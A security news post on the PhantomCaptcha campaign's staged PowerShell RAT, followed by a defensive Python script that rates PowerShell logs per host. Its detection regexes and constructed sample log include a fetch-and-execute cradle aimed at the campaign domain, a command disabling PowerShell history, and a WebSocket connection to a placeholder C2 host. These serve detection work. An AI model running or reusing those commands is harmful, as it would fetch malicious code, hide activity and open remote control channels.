PhantomCaptcha Hits Ukraine Aid With WebSocket RAT
A spear-phishing campaign tracked as PhantomCaptcha targeted Ukrainian aid organizations on October 8, 2025, delivering a WebSocket-based remote access trojan. SentinelOne researchers found that the attackers impersonated the Ukrainian President's Office to send malicious PDF files to organizations including the Red Cross, UNICEF and local administrations. Victims were redirected to a fake Zoom site that hosted the malware.
The campaign delivered a multi-stage PowerShell payload. The first stage fetched a downloader; the second collected and exfiltrated system information and disabled PowerShell command-history logging, removing a record of what had been run on the host; the third delivered the WebSocket RAT, which gave the attackers a remote shell and persistent control over infected systems.
The delivery infrastructure, including zoomconference[.]app, was hosted on Russian servers and was active for only 24 hours, although the command-and-control nodes kept operating afterwards. SentinelOne tied related IP addresses and domains to the same group and found fake Android apps connected to the operation. Researchers noted possible links to COLDRIVER, a Russian APT group.
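The staging described above (download cradle, host reconnaissance plus history suppression, then a WebSocket client) maps directly onto what shows up in PowerShell script-block logging (Event ID 4104), which is where a defender would look for it. The Python below is an added example written for this page, not SentinelOne's code and not strings recovered from the PhantomCaptcha malware: the indicator regexes are assumptions about the usual PowerShell idioms for each stage (the article does not quote the actual commands), the log records, hostnames and the wss://c2.invalid endpoint are constructed, and the only indicator taken from the page is zoomconference[.]app, kept defanged as printed and refanged for matching.

```python
"""Triage PowerShell script-block log text for the staged tradecraft the
article describes.  Added example for this page; not SentinelOne's code and
not strings recovered from the PhantomCaptcha malware."""
import re
from collections import defaultdict

# The only indicator named on the page, kept defanged as printed there.
DEFANGED_IOCS = ["zoomconference[.]app"]


def refang(ioc: str) -> str:
    """Restore a defanged indicator ('[.]', 'hxxp') to its matchable form."""
    return (ioc.replace("[.]", ".")
               .replace("hxxps://", "https://")
               .replace("hxxp://", "http://"))


IOC_DOMAINS = [refang(i).lower() for i in DEFANGED_IOCS]

# One pattern per stage.  These are assumptions about common PowerShell idioms
# for each behaviour, not commands quoted from the campaign.
INDICATORS = {
    "download_cradle": re.compile(
        r"Invoke-WebRequest|\biwr\b|DownloadString|Invoke-Expression|\biex\b", re.I),
    "recon": re.compile(
        r"Get-ComputerInfo|Get-WmiObject|Get-CimInstance|whoami|hostname", re.I),
    "history_off": re.compile(
        r"Set-PSReadLineOption\s+-HistorySaveStyle\s+SaveNothing|ConsoleHost_history", re.I),
    "websocket": re.compile(
        r"System\.Net\.WebSockets|wss?://", re.I),
}

# Constructed log format: "<timestamp> <host> <event id> <script block text>".
LOG_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<host>\S+)\s+(?P<eid>\d+)\s+(?P<script>.*)$")


def parse_line(line: str):
    """Return the fields of a 4104 (script block) record, or None for anything else."""
    m = LOG_RE.match(line)
    if not m or m.group("eid") != "4104":
        return None
    return m.groupdict()


def classify(script: str) -> set:
    """Set of stage indicators present in one script block."""
    hits = {name for name, rx in INDICATORS.items() if rx.search(script)}
    if any(d in script.lower() for d in IOC_DOMAINS):
        hits.add("known_ioc")
    return hits


def severity(hits: set) -> str:
    # A lone download cradle is routine admin activity; a WebSocket client
    # combined with history suppression, or any contact with a known domain,
    # is what makes a host worth pulling for incident response.
    if "known_ioc" in hits or {"websocket", "history_off"} <= hits:
        return "high"
    if len(hits) >= 2:
        return "medium"
    return "low" if hits else "none"


def triage(lines):
    """Aggregate indicators per host across all its script blocks and rate them."""
    per_host = defaultdict(set)
    for line in lines:
        rec = parse_line(line)
        if rec:
            per_host[rec["host"]] |= classify(rec["script"])
    return {h: {"hits": sorted(v), "severity": severity(v)} for h, v in per_host.items()}


# Constructed sample records; hostnames, paths and the wss://c2.invalid endpoint
# are placeholders, not infrastructure reported for this campaign.
SAMPLE_LOG = [
    "2025-10-08T09:12:03Z WS-AID-01 4104 iex (New-Object Net.WebClient).DownloadString('https://zoomconference.app/')",
    "2025-10-08T09:12:05Z WS-AID-01 4104 Set-PSReadLineOption -HistorySaveStyle SaveNothing; $i = Get-ComputerInfo | ConvertTo-Json",
    "2025-10-08T09:12:09Z WS-AID-01 4104 $ws = New-Object System.Net.WebSockets.ClientWebSocket; $ws.ConnectAsync([Uri]'wss://c2.invalid/', $ct)",
    "2025-10-08T10:01:00Z WS-AID-02 4104 Invoke-WebRequest -Uri https://example.org/tool.zip -OutFile tool.zip",
    "2025-10-08T10:05:00Z WS-AID-03 4104 whoami /all; Invoke-WebRequest https://example.org/x -OutFile x",
    "2025-10-08T10:06:00Z WS-AID-04 4103 Get-Date",
]

if __name__ == "__main__":
    for host, r in sorted(triage(SAMPLE_LOG).items()):
        print(f"{host}: {r['severity']:6} {', '.join(r['hits'])}")
```

In practice the input would come from an export of Microsoft-Windows-PowerShell/Operational, and the aggregation per host is the point: each stage on its own looks like ordinary administration (an analyst downloading a tool with Invoke-WebRequest rates only "low" here), whereas the sequence of cradle, recon, history suppression and a WebSocket client on one machine is what the campaign's staging looks like from the defender's side.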
